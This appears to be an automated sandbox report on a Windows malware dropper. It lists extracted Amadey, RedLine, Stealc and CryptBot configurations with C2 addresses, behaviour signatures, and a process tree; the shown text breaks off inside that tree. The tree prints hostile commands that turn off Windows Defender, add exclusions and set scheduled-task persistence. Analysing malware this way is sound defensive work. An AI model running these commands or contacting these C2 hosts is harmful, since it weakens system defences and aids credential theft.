Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:35

General

  • Target

    5ba0fa5b9cd80353f88930547daef763dd9ba34270a7e9976d3bb123b06de7b7.exe

  • Size

    1.8MB

  • MD5

    b8ee24976de1fd94e9bc19dbefa3f2ae

  • SHA1

    a3fe707f68aa417fa247b560c98f4c7c257306e6

  • SHA256

    5ba0fa5b9cd80353f88930547daef763dd9ba34270a7e9976d3bb123b06de7b7

  • SHA512

    13cb8143ba7e79008053a98f161fd77ffe0be333358e7c3b1788739eb79ec67ff48be8f44dff07a9871b7435303d967001e83b7ff7510ffd0bdc0bfeece3eae0

  • SSDEEP

    24576:/X9fwHI1RrpjCR+OH1IedDvfM+IF/pTfBzvrdE+TLQPslJW2IpAWr0uplDvOg0Kw:1AEWRrH1IgnO7JlDTMWytr0u7Dx

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

cryptbot

C2

sevtvf17ht.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • .NET Reactor proctector 7 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 40 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 27 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 36 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 30 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1184
      • C:\Users\Admin\AppData\Local\Temp\5ba0fa5b9cd80353f88930547daef763dd9ba34270a7e9976d3bb123b06de7b7.exe
        "C:\Users\Admin\AppData\Local\Temp\5ba0fa5b9cd80353f88930547daef763dd9ba34270a7e9976d3bb123b06de7b7.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:304
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2508
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2500
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2028
            • C:\Users\Admin\AppData\Roaming\xUqahMU64E.exe
              "C:\Users\Admin\AppData\Roaming\xUqahMU64E.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
            • C:\Users\Admin\AppData\Roaming\C5TZh05uxD.exe
              "C:\Users\Admin\AppData\Roaming\C5TZh05uxD.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:316
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:684
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:944
              • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                PID:2972
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:3144
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3120
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2064
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1032
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              PID:884
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2744
            • C:\Users\Admin\AppData\Local\Temp\filename.exe
              "C:\Users\Admin\AppData\Local\Temp\filename.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1292
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "filename.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\filename.exe" & exit
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3348
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im "filename.exe" /f
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3332
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            PID:2284
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1180
          • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
            "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:1328
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
              5⤵
              • Loads dropped DLL
              PID:1312
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:1672
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                6⤵
                  PID:2540
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2996
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                  6⤵
                    PID:1684
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 607698
                    6⤵
                      PID:2604
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "MaskBathroomCompositionInjection" Participants
                      6⤵
                        PID:2892
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                        6⤵
                          PID:1568
                        • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                          Waters.pif Q
                          6⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2688
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:1796
                    • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1628
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                          PID:1640
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2888
                      • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1688
                        • C:\Users\Admin\AppData\Local\Temp\7zSFEE8.tmp\Install.exe
                          .\Install.exe
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:2696
                          • C:\Users\Admin\AppData\Local\Temp\7zS7E.tmp\Install.exe
                            .\Install.exe /RNXdidDHt "385121" /S
                            6⤵
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Enumerates system info in registry
                            PID:1548
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:2128
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:2452
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  9⤵
                                    PID:2564
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      10⤵
                                        PID:2176
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:2956
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2732
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        10⤵
                                          PID:2008
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      8⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:1468
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        9⤵
                                          PID:2208
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            10⤵
                                              PID:1116
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                          8⤵
                                          • Indirect Command Execution
                                          PID:2820
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            9⤵
                                              PID:892
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                10⤵
                                                  PID:1728
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              8⤵
                                              • Indirect Command Execution
                                              PID:1916
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                9⤵
                                                  PID:2484
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    10⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2216
                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                      11⤵
                                                        PID:2980
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                7⤵
                                                • Indirect Command Execution
                                                PID:2396
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  8⤵
                                                    PID:2804
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      9⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2948
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        10⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2300
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\RgEfSZt.exe\" PV /kQAhdidzAxN 385121 /S" /V1 /F
                                                  7⤵
                                                  • Drops file in Windows directory
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:684
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 560
                                                  7⤵
                                                  • Loads dropped DLL
                                                  • Program crash
                                                  PID:2392
                                          • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                            4⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Adds Run key to start application
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious behavior: AddClipboardFormatListener
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2648
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1200
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3284
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3108
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3320
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                              5⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3936
                                            • C:\Users\Admin\AppData\Local\Temp\pngeqg.exe
                                              "C:\Users\Admin\AppData\Local\Temp\pngeqg.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3952
                                            • C:\Users\Admin\AppData\Local\Temp\vudyku.exe
                                              "C:\Users\Admin\AppData\Local\Temp\vudyku.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Modifies system certificate store
                                              PID:3124
                                            • C:\Users\Admin\AppData\Local\Temp\ggzfxv.exe
                                              "C:\Users\Admin\AppData\Local\Temp\ggzfxv.exe"
                                              5⤵
                                              • Blocklisted process makes network request
                                              • Executes dropped EXE
                                              • Modifies system certificate store
                                              PID:1284
                                          • C:\Users\Admin\AppData\Local\Temp\1000308001\995606c7bd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000308001\995606c7bd.exe"
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Loads dropped DLL
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1796
                                          • C:\Users\Admin\AppData\Local\Temp\1000309001\840f52a625.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000309001\840f52a625.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:3008
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                              5⤵
                                                PID:2020
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                  6⤵
                                                  • Checks processor information in registry
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:1568
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.0.1117500567\800055915" -parentBuildID 20221007134813 -prefsHandle 1276 -prefMapHandle 1252 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c381c8c4-b04e-4831-8917-70465c680af3} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 1340 105d8c58 gpu
                                                    7⤵
                                                      PID:872
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.1.1773145372\1978007165" -parentBuildID 20221007134813 -prefsHandle 1544 -prefMapHandle 1540 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45420c6b-3c21-4d24-af09-1217a5250184} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 1556 f2eb558 socket
                                                      7⤵
                                                        PID:1788
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.2.2124481397\1823571402" -childID 1 -isForBrowser -prefsHandle 2016 -prefMapHandle 2012 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d980698f-db4e-475a-86e4-27f9a75c48ae} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 2028 1988ab58 tab
                                                        7⤵
                                                          PID:2176
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
